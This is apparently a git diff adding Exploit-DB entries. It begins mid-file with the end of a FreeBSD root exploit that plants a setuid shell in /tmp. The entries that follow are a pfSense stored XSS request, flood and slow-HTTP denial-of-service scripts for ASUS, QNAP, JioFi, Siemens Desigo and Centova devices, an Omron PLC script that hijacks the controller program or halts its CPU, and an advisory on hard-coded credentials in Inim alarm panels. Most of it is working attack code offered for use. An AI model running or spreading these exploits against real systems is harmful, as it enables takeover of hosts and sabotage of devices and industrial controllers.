+    pthread_join(trigger_thread, NULL);
+    
+    pthread_mutex_destroy(&write_mtx);
+    pthread_mutex_destroy(&trigger_mtx);
+    pthread_cond_destroy(&write_cond);
+    pthread_cond_destroy(&trigger_cond);
+
+    // Prevent a kernel panic
+    prevent_panic(*fd_ptr);
+
+    // fd was acquired from write_to_file
+    // which allocs a pointer for it
+    free(fd_ptr);
+}
+
+int main(int argc, char **argv)
+{
+    setbuf(stdout, NULL);
+    
+    fire();
+    
+    return 0;
+}
+
+EOF
+
+# Compile with -m32 to exploit FreeBSD-SA-19:24.mqueuefs
+cc -o exploit -lpthread exploit.c
+# cc -o exploit -m32 -lpthread exploit.c
+
+cat > program.c << EOF
+#include <unistd.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <stdlib.h>
+
+void _init()
+{
+  if (!geteuid())
+    execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
+}
+
+EOF
+
+# Compile the shared library object
+cc -o program.o -c program.c -fPIC
+cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
+cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
+
+# Start the exploit
+#
+# su will execute the shared library object
+# that creates the shell binary copy
+echo "[+] Firing the Exploit"
+./exploit
+su
+
+# Ensure that everything has worked
+# and execute the root-shell
+if [ -f /tmp/xxxx ]; then
+    echo "[+] Enjoy!"
+    echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf"
+    /tmp/xxxx
+else
+    echo "[!] FAIL"
+fi
\ No newline at end of file
diff --git a/exploits/freebsd/webapps/48300.txt b/exploits/freebsd/webapps/48300.txt
new file mode 100644
index 000000000..f485c9955
--- /dev/null
+++ b/exploits/freebsd/webapps/48300.txt
@@ -0,0 +1,39 @@
+# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
+# Date: 2020-04-02
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.pfsense.org
+# Version: PfSense 2.4.4-P3
+# Tested on: FreeBSD 11.2-RELEASE-p10
+# CVE : CVE-2020-11457
+
+# Vulnerability Details
+# Description :  A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel.
+# Vulnerable Parameter : descr 
+
+
+# POC
+# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name.  
+# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is 
+# the id of the user containing the payload.
+
+
+POST /system_usermanager.php?act=new HTTP/1.1
+Host: TARGET
+Connection: close
+Content-Length: 410
+Cache-Control: max-age=0
+Origin: https://TARGET
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Sec-Fetch-Dest: document
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Referer: https://TARGET/system_usermanager.php?act=new
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d
+
+__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save
\ No newline at end of file
diff --git a/exploits/hardware/dos/46720.sh b/exploits/hardware/dos/46720.sh
new file mode 100755
index 000000000..83f3a31a7
--- /dev/null
+++ b/exploits/hardware/dos/46720.sh
@@ -0,0 +1,34 @@
+# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS 
+# Date: 2019-04-14 # Exploit Author: YinT Wang; 
+# Vendor Homepage: www.asus.com 
+# Version: Hardware version: HG100 、Firmware version:  1.05.12   
+# Tested on: Currnet 1.05.12 
+# CVE : CVE-2018-11492
+
+1. Description 
+The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492).
+
+2.Proof of Concept
+Just Execute the following script in kali which could crash the devices
+
+    1. IPv4 packet and in result of devices crash.which written in linux script.
+
+        #needed to co-operate with hping3 tool
+        #with the time period at least 220s which could cause web server of HG100 devices crash
+        #!/bin/bash
+        read -p "enter the ip of HG100 here " url
+        hping3 -V -c 10000 -S -w 64 --flood --rand-source $url
+        sleep 220
+        echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s"
+        exit 0
+
+    2.Slowhttp test and caused the devices crash.which written in linux script.
+
+        #needed to co-operate with slowhttptest tool
+        #with the time period 600s which could cause web server of HG100 devices crash
+        #!/bin/bash
+        read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url
+        slowhttptest -H -R -c 10000 -l 600 -u $url
+        sleep 600
+        echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s"
+        exit 0
\ No newline at end of file
diff --git a/exploits/hardware/dos/46733.py b/exploits/hardware/dos/46733.py
new file mode 100755
index 000000000..3b700a247
--- /dev/null
+++ b/exploits/hardware/dos/46733.py
@@ -0,0 +1,29 @@
+#!/usr/bin/python
+# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS
+# Date: 19/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.qnap.com
+# Version: 1.3.4.0317 and below are vulnerable
+# Software Link: https://www.qnap.com/en/utilities/essentials
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP/7/10 (version 1.3.3.0925)
+# CVE: CVE-2019-7181
+# POC
+# 1.) Generate qnap.txt
+# 2.) Copy the contents of qnap.txt to the clipboard
+# 3.) Paste the contents in any username/password field(Add or Edit VPN)
+# 4.) Click ok, program crashes.
+# This vulnerability was responsibly disclosed February 3, 2019, new version has been released.
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+    f=open("qnap.txt","w")
+    print "[+] Creating %s bytes QNAP payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/hardware/dos/46752.txt b/exploits/hardware/dos/46752.txt
new file mode 100644
index 000000000..a6cfd636b
--- /dev/null
+++ b/exploits/hardware/dos/46752.txt
@@ -0,0 +1,66 @@
+# Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices allows a DoS (Hang) via the mask POST parameter
+# Exploit Author:  Vikas Chaudhary
+# Date: 21-01-2019
+# Vendor Homepage: https://www.jio.com/
+# Hardware Link:  https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
+# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
+# Category: Hardware
+# Contact: https://www.facebook.com/profile.php?id=100011287630308
+# Web:  https://gkaim.com/
+# Tested on: Windows 10 X64- Firefox-65.0
+# CVE-2019-7439
+***********************************************************************
+## Vulnerability Description :- A denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
+----------------------------------------
+# Proof Of Concept:
+1- First Open BurpSuite
+2- Make Intercept on 
+3 -Go to your Wifi Router's  Gateway in Browser  [i.e http://192.168.225.1 ]
+4-Capture the data and then Spider the Host
+5- Now You find a Link like this  [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ]
+6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ]
+7-Vulnerable parameter is => mash 
+8-Paste this PAYLOD  in mask parameter and then show Response in browser 
+Payload => 
+
+<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>
+
+9-Now it will show => {"commit":"Socket Connect Error"}
+10-- It Means  Router is Completely  Stopped ,
+----------------------------------------
+Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter 
+-----------------------------------------
+Solution:-
+
+You have to Remove your battery and then again insert it to make Normal.
+-----------------------------------------------------------------------------------
+REQUEST 
+------------
+POST /cgi-bin/qcmap_web_cgi HTTP/1.1
+Host: 192.168.225.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
+Accept: text/plain, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.225.1/
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 167
+Connection: close
+
+Page=GetWANInfo&mask=<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>&token=0
+
+****************************
+RESPONSE
+----------
+HTTP/1.1 200 OK
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+X-Frame-Options: SAMEORIGIN
+connection: close
+Content-Type: text/html
+Content-Length: 33
+Date: Mon, 21 Jan 2019 18:17:34 GMT
+Server: lighttpd/1.4.35
+
+{"commit":"Socket Connect Error"}
+---------------------------------------------------------------------------------------------------------------
\ No newline at end of file
diff --git a/exploits/hardware/dos/47657.txt b/exploits/hardware/dos/47657.txt
new file mode 100644
index 000000000..73dcbf51c
--- /dev/null
+++ b/exploits/hardware/dos/47657.txt
@@ -0,0 +1,109 @@
+# Title: Siemens Desigo PX 6.00 - Denial of Service (PoC)
+# Author: LiquidWorm
+# Date: 2019-11-14
+# Vendor web page: https://www.siemens.com
+# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
+# Affected version:6.00
+# Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D
+#                   With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2
+#                   All firmware versions < V6.00.320
+#                   ------
+#                   Model: PXC00-U, PXC64-U, PXC128-U
+#                   With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2
+#                   All firmware versions < V6.00.320
+#                   ------
+#                   Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D
+#                   With activated web server
+#                   All firmware versions < V6.00.320
+# CVE: N/A
+# Advisory ID: ZSL-2019-5542
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php
+
+#!/bin/bash
+#
+#
+# Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
+#
+#
+# Vendor: Siemens AG
+# Vendor web page: https://www.siemens.com
+# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
+
+#
+# Summary: Desigo PX is a modern building automation and control
+# system for the entire field of building service plants. Scalable
+# from small to large projects with highest degree of energy efficiency,
+# openness and user-friendly operation.
+#
+# Desc: The device contains a vulnerability that could allow an attacker
+# to cause a denial of service condition on the device's web server
+# by sending a specially crafted HTTP message to the web server port
+# (tcp/80). The security vulnerability could be exploited by an attacker
+# with network access to an affected device. Successful exploitation
+# requires no system privileges and no user interaction. An attacker
+# could use the vulnerability to compromise the availability of the
+# device's web service. While the device itself stays operational, the
+# web server responds with HTTP status code 404 (Not found) to any further
+# request. A reboot is required to recover the web interface.
+#
+# Tested on: HP StorageWorks MSL4048 httpd
+#
+# ================================================================================
+# Expected result after sending the directory traversal sequence: /dir?dir=../../:
+# --------------------------------------------------------------------------------
+#
+# $ curl http://10.0.0.17/index.htm
+# <HEAD><TITLE>404 Not Found</TITLE></HEAD>
+# <BODY><H1>404 Not Found</H1>
+# Url '/INDEX.HTM' not found on server<P>
+# </BODY>
+#
+# ================================================================================
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# Zero Science Lab - https://www.zeroscience.mk
+# @zeroscience
+#
+#
+
+#
+# Vendor ID: SSA-898181
+# Vendor Fix: https://support.industry.siemens.com/cs/document/109772802
+# Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf
+# Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt
+# Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
+#
+# CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter
+# CWE URL: https://cwe.mitre.org/data/definitions/472.html
+# CVE ID: CVE-2019-13927
+# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927
+# CVSS v3.1 Base Score: 5.3
+# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C
+#
+#
+# 06.06.2019
+#
+
+
+echo -ne "\n----------------------------------"
+echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS"
+echo -ne "\n----------------------------------\n"
+if [ "$#" -ne 1 ]; then
+	echo -ne "\nUsage: $0 [ipaddr]\n\n"
+	exit
+fi
+IP=$1
+TARGET="http://$IP/"
+PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"`
+echo -ne "\n[+] Sending payload to $IP on port 80."
+curl -s "$TARGET$PAYLOAD" > /dev/null
+echo -ne "\n[*] Done"
+echo -ne "\n[+] Checking if exploit was successful..."
+status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}')
+if [ "$status" == "404" ]; then
+	echo -ne "\n[*] Exploit successful!\n"
+else
+	echo -ne "\n[-] Exploit unsuccessful.\n"
+	exit
+fi
\ No newline at end of file
diff --git a/exploits/hardware/dos/47677.sh b/exploits/hardware/dos/47677.sh
new file mode 100755
index 000000000..221ef8705
--- /dev/null
+++ b/exploits/hardware/dos/47677.sh
@@ -0,0 +1,32 @@
+# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC)
+# Date: 2019-11-18
+# Exploit Author: DroidU
+# Vendor Homepage: https://centova.com
+# Affected Version: <=v3.2.12
+# Tested on: Debian 9, CentOS 7
+# ===============================================
+# The Centova Cast becomes out of control and causes 100% CPU load on all cores.
+
+#!/bin/bash
+if [ "$3" = "" ]
+then
+echo "Usage: $0 centovacast_url reseller/admin password"
+exit
+fi
+url=$1
+reseller=$2
+pass=$3
+
+
+dwn() {
+echo -n .
+curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero" &
+}
+
+for i in {0..32}
+do
+dwn /dev/zero
+sleep .1
+done
+echo "
+Done!"
\ No newline at end of file
diff --git a/exploits/hardware/dos/47757.py b/exploits/hardware/dos/47757.py
new file mode 100755
index 000000000..772611f98
--- /dev/null
+++ b/exploits/hardware/dos/47757.py
@@ -0,0 +1,197 @@
+# Exploit Title: Omron PLC 1.0.0 - Denial of Service (PoC)                                          
+# Google Dork: n/a                                                                                    
+# Date: 2019-12-06                                                                                    
+# Exploit Author: n0b0dy                                                                              
+# Vendor Homepage: https://automation.omron.com, ia.omron.com                                         
+# Software Link: n/a                                                                                  
+# Version: 1.0.0                                                                                      
+# Tested on: PLC f/w rev.: CJ2M (v2.01)                                                               
+# CWE-412 : Unrestricted Externally Accessible Lock                                                   
+# CVE : n/a    
+
+#!usr/bin/python
+
+######################################################################################################
+#                                                                                                     #
+#                                     `-:+oyhdmmNNNNNNNNmdhyso/:.                                     #
+#                                -/shmNmhyo+/:-..`````..--:/oshdNNdyo:.                               #
+#                           `:ohNmho/-`                          .:+ydNmy+.                           #
+#                        .+hNms/.                                     `:ohNms:`                       #
+#                     .+dNh+.                                             `/ymNy:                     #
+#                   :yNd+.                                                   `/yNmo.                  #
+#                `/dNy-`                                                        .+mNy-                #
+#               +mmo.                                                             `/dNy-              #
+#             :dNo`                      ``........--.......```                     `/dNs.            #
+#           .yNy.         .-        ``....```....``..``....```...``        `-`        `+Nm/           #
+#          /mm:       ./ymy.     `...``  `..`  ``  .`  `` `..`   `...`      +mho:`      .yMh.         #
+#        `sNy.   `.`/hNMNo`    `..`    `.`    .`   .`   ``   `..    `...`    -dMNmo...   `+Nm:        #
+#       `yNo`  -yy-sMMMh-    ......```.`     .`    .`    ``    .-...`` `..`   `+NMMm:+h+`  :mN/       #
+#      `hN/   +Nm.sMMh/:   `..     `.....```..` `//+yy+.``.``...`..`     `..   ./oNMm-oMh.  -dN+      #
+#     `hN+  `/MMo:Nh:/h- `..`      ..     `..```oMy.:NMd```.      ..       `.`  ys:omh.NMh`  .mM/     #
+#     yM+ `o-hMN.:+sdm/ `-.       ..       .`   ./-./NNo   .`      ..       `.` .hmy+/`sMM-o- -mN:    #
+#    +My .dd`mMy/hNmo. `-`````   `.       `-       :ho.    `.       ..    ````.. `/hNmo/NM//N/ :Mm`   #
+#   .mm. sMd`mMmNd+/` `-`    ``..-.```    ..       +.       .`    ``.-...``    ..  :/yNNNM/:MN` sMs   #
+#   yM+ `mMm`mMm+-ss `-`        ..```.....-....```-o+.```...-.....```.-`        .` -h/:yMM/+MM/ .mN-  #
+#  .Nm` `NMN`yo/yNd. ..         -`       `-```````yNm-```````.       `-`        `.  oNd++h:sMM+  oMy  #
+#  +Mo `.NMM.:hNMd. `-`        `.        .-       `:-       `-        ..         .` `oNMmo`yMM+. .NN` #
+#  hN- y:hMMoNMmo.  ..         .`        ..        .`        -        `-         `.   /hMMydMM-h. dM/ #
+# .mm`-No-NMMMy-o:  ..         .`        ..      .://-` `    -`       `-`         -   y-+mMMMy.Ns sMs #
+# :Nd :Mm.oMMo.sN.  ..`````````-`````````..`./s` :smds: :s:``-`````````-.`````````-`  ym--NMm.sMh +Mh #
+# +Mh -NMy`hd-hMd`  ..`````````-```````.-/+smMy   -my`  `dNho/.````````-``````````-   /Mm/+N:-NMs /Mh #
+# /Nh  hMM/-/hMM/   ..         .` `+yhdmmNMMMM.   .so`   yMMMNmhyso+/.`-`        `-   `mMN/+.dMM- /Mh #
+# -Nd` -NMm-+MMh.   `.         .` oMMMMMMMMMMN`   `hy    yMMMMMMMMMMMd.-         `.   `/MMd`yMMy  oMy #
+# `mN.`.oNMhyMN-o/   -`        `.`mMMMMMMMMMMM-   -NN.  `dMMMMMMMMMMMM/.         .`  `y`hMNoMMh.- yMo #
+#  yM:.h./mMMMs dm`  `.         .+MMMMMMMMMMMMo   /MM/  :NMMMMMMMMMMMMs`        `.   oN--NMMNy.+o`mM- #
+#  /My`dd/-yNM:.NM+   ..      ``.hMMMMMMMMMMMMN-  oMMo `hMMMMMMMMMMMMMh.`      `.`  `mMo`dMm/-yN/:Mm` #
+#  `mN./MMh-/d/+MMs    .` ``````.NMMMMMMMMMMMMMm- sMMs oMMMMMMMMMMMMMMm.````` `.`   -NMd`ds-omMh`hMo  #
+#   +Ms oNMNo--sMMh`-   ..`     oMMMMMMMMMMMMMMMm:yMMhoMMMMMMMMMMMMMMMN-    `..`  `-:MMN.:/dMMd.:Nm.  #
+#   `hN: /NMMm/+MMm`h+   ..     mMMMMMMMMMMMMMMMMNNMMMMMMMMMMMMMMMMMMMMo    `.`  -h-oMMd-yMMMy.`dM/   #
+#    -Nm. +yNMMdNMN-/Ms`  `.`  -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh   ..   :mh`hMMdNMNdo- sMy    #
+#     /Nh`:y+odNMMMo`mMy    ..`/MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm``.`   :NM/.NMMMmy+os`oMd.    #
+#      +Mh`+Nh//odNm`oMM+    `.sMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN.`    .mMN`oNmy+/smh`+Mm.     #
+#       +Nh./mMNho++-.mMN/-/`  hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM- `-:.dMMo`+++ymMNs.oNd-      #
+#        /Nd-.omMMMmy+/dMN//ds-hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM//hy-dMNs:sdMMMNh:`sMh.       #
+#         -dN+``/ymNMMNdmMMo/mNdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNMs:mMNdmMMNmh+. -dMs`        #
+#          `yNy. /o+/oyhmmNNy:hNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm//mNNmdys+/+o.`oNm/          #
+#            :mNo`:dmdyo////+:./yNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdo--+//:/+shmmo.:dNy.           #
+#             `+mm+.:smNMMMMMMMMNNNNmmMMMMMMMMMMMMMMMMMMMMMMMMMMNhmNNNNMMMMMMMMMNh+.:hNh-             #
+#               `oNmo.`.+ooooo+//:--:yMMMMMMMMMMMMMMMMMMMMMMMMMMmo/--::/++ooooo:``/hNd:               #
+#                 `+mNs:.+yso++oshmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNdys+++oys:.odNh:                 #
+#                    :yNdo-/sdNNMMMNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMdmNNMMNNmy+:/hNmo.                   #
+#                      `+hNds:``...`/MMMMMMMMMMMMMMMMMMMMMMMMMMMM: `....`-ohNms:                      #
+#                         `/ymNds/.`sMMMMMMMMMMMMMMMMMMMMMMMMMMMM+  `:ohNNdo-                         #
+#                             ./sdNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMdhmNNho:`                            #
+#                                 `-/oydNMMMMMMMMMMMMMMMMMMMMMMmhy+:.                                 #
+#                                        `.://+osyyyyyyso+/:-.                                        #
+#                                                                                                     #
+#                                                                                                     #
+# Exploit Title: Omron PLC: Denial-of-Service as a Feature                                            #
+# Google Dork: n/a                                                                                    #
+# Date: 2019.12.06                                                                                    #
+# Exploit Author: n0b0dy                                                                              #
+# Vendor Homepage: https://automation.omron.com, ia.omron.com                                         #
+# Software Link: n/a                                                                                  #
+# Version: 1.0.0                                                                                      #
+# Tested on: PLC f/w rev.: CJ2M (v2.01)                                                               #
+# CWE-412 : Unrestricted Externally Accessible Lock                                                   #
+# CVE : n/a                                                                                           #
+#                                                                                                     #
+#######################################################################################################
+import sys, signal, socket, time, binascii
+
+nic = socket.gethostbyname(socket.gethostname()) #will fail if hostname = 'hostname'
+
+if len(sys.argv) < 2:
+	print "Usage: fins.dos.py [arg.] {target ip} {target port[9600]}"
+	print "--pwn	Hijack control of PLC program."
+	print "--stop	Stop PLC CPU."
+
+else:
+	ip = sys.argv[2]
+
+	try:
+		port = sys.argv[3]
+	except:
+		port = 9600
+
+	def ip_validate(ip):
+		a = ip.split('.')
+		if len(a) != 4:
+			return False
+		for x in a:
+			if not x.isdigit():
+				return False
+			i = int(x)
+			if i < 0 or i > 255:
+				return False
+		return True
+
+	#fins header
+	icf = '\x80' #info control field (flags); 80=resp req, 81=resp not req
+	rsv = '\x00' #reserved
+	gct = '\x02' #gateway count
+	dna = '\x00' #dest net addr
+	idnn = ip[-1:] #dest node no (last digit of target ip)
+	dnn_i = '0' + idnn
+	dnn = binascii.a2b_hex(dnn_i)
+	dua = '\x00' #dest unit addr
+	sna = '\x00' #source net addr
+	isnn = nic[-1:] #source node no (last digit of own ip)
+	snn_i = '0' + isnn
+	snn = binascii.a2b_hex(snn_i)
+	sua = '\x00' #source unit addr
+	sid = '\x7a' #service ID
+	fins_hdr = icf + rsv + gct + dna + dnn + dua + sna + snn + sua + sid
+
+	#FINS command acceptance code
+	fins_ok = '\x00'
+	#Verify PLC type
+	CmdMRst1 = binascii.a2b_hex("05")
+	CmdSRst1 = binascii.a2b_hex("01")
+	Cmdst1 =\
+		fins_hdr + CmdMRst1 + CmdSRst1 + '\x00'
+	print "Probing PLC... " + '\t'
+	s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+	s1.sendto(Cmdst1, (ip, port))
+	print "Finished." + '\r\n'
+	s1fins_resp = s1.recvfrom(1024)
+	s1fins_resp_b = bytes(s1fins_resp[0])
+	if s1fins_resp_b[12] == fins_ok and s1fins_resp_b[13] == fins_ok:
+		print "FINS target is exploitable: "
+		print s1fins_resp_b[14:39]
+	else:
+		print "FINS target not exploitable."
+		print "FINS response from target: ", s1fins_resp
+
+	if sys.argv[1] == "--pwn":
+
+		#access right forced acquire
+		PgmNo = '\xff'
+		CmdMRst2 = binascii.a2b_hex("0c")
+		CmdSRst2 = binascii.a2b_hex("02")
+		Cmdst2 =\
+			fins_hdr + CmdMRst2 + CmdSRst2 + PgmNo + PgmNo
+		reqdly = 1
+		persist = 1
+		pwnage = 0
+		print "Obtaining control of PLC program..." + '\r\n'
+		while persist == 1:
+			try:
+				s2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+				time.sleep(reqdly)
+				s2.sendto(Cmdst2, (ip, port))
+				s2fins_resp = s2.recvfrom(1024)
+				s2fins_resp_b = bytes(s2fins_resp[0])
+				if s2fins_resp_b[12] == fins_ok and s2fins_resp_b[13] == fins_ok:
+					pwnage += 1
+					pwntime = str(pwnage)
+					sys.stdout.write('\r' + "Pwnage in progress! " + "duration: " + pwntime + " sec.")
+					sys.stdout.flush()
+				else:
+					print "Attack unsuccessful. ", '\r\n'
+					print "FINS error code: ", s2fins_resp
+			except socket.error as e:
+				print socket.error
+				s2.close()
+			except KeyboardInterrupt:
+				persist = 0
+				print '\r', " Attack interrupted by user."
+				s2.close()
+
+	elif sys.argv[1] == "--stop":
+		#change OP Mode
+		CmdMRst3 = binascii.a2b_hex("04")
+		CmdSRst3 = binascii.a2b_hex("02")
+		Cmdst3 =\
+			fins_hdr + CmdMRst3 + CmdSRst3
+		print "Stopping PLC (just for fun)... " + '\t'
+		s3 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+		s3.sendto(Cmdst3, (ip, port))
+		print "Finished. "
+		s3fins_resp = s3.recvfrom(1024)
+		s3fins_resp_b = bytes(s3fins_resp[0])
+		if s3fins_resp_b[12] == fins_ok and s3fins_resp_b[13] == fins_ok:
+			print "PLC CPU STOP mode confirmed. "
+		else:
+			print "Attack unsuccessful. ", '\r\n'
+			print "FINS response from target: ", s3fins_resp
\ No newline at end of file
diff --git a/exploits/hardware/local/47763.txt b/exploits/hardware/local/47763.txt
new file mode 100644
index 000000000..0b5ae452a
--- /dev/null
+++ b/exploits/hardware/local/47763.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials
+# Exploit Author: LiquidWorm
+# Date: 2019-12-09
+# Product web page: https://www.inim.biz
+# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?  
+# Advisory ID: ZSL-2019-5546
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php
+
+Inim Electronics Smartliving SmartLAN/G/SI <=6.x Hard-coded Credentials
+
+
+Vendor: INIM Electronics s.r.l.
+Product web page: https://www.inim.biz
+Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+Affected version: <=6.x
+Affected models: SmartLiving 505
+                 SmartLiving 515
+                 SmartLiving 1050, SmartLiving 1050/G3
+                 SmartLiving 10100L, SmartLiving10100L/G3
+
+Summary: SmartLiving anti-intrusion control panel and security system provides
+important features rarely found in residential, commercial or industrial application
+systems of its kind. This optimized-performance control panel provides first-rate
+features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
+end-to-end voice transmission (voice-on-bus), IP connectivity.
+
+SMARTLAN/SI:
+The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
+networking capability and fast connectivity to the Internet. Therefore, it is possible
+to set up a remote connection and program or control the system via the SmartLeague
+software application. In effect, the SmartLAN/SI board grants the same level of access
+to the system as a local RS232 connection.
+
+SMARTLAN/G:
+The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
+advanced remote-access and communication functions. The SmartLAN/G board is capable of
+sending event-related e-mails automatically. Each e-mail can be associated with a subject,
+an attachment and a text message. The attachment can be of any kind and is saved to an
+SD card. The message text can contain direct links to domains or IP addressable devices,
+such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
+global access to their control panels via any Internet browser accessed through a PC,
+PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
+distinguishing the means of connection and as a result provides an appropriate web-page
+for the tool in use. Smartphones can control the system in much the same way as a
+household keypad, from inside the house or from any part of the world.
+
+Desc: The devices utilizes hard-coded credentials within its Linux distribution image.
+These sets of credentials (Telnet, SSH, FTP) are never exposed to the end-user and cannot
+be changed through any normal operation of the smart home device. Attacker could exploit
+this vulnerability by logging in and gain system access.
+
+Tested on: GNU/Linux 3.2.1 armv5tejl
+           Boa/0.94.14rc21
+           BusyBox v1.20.2
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5546
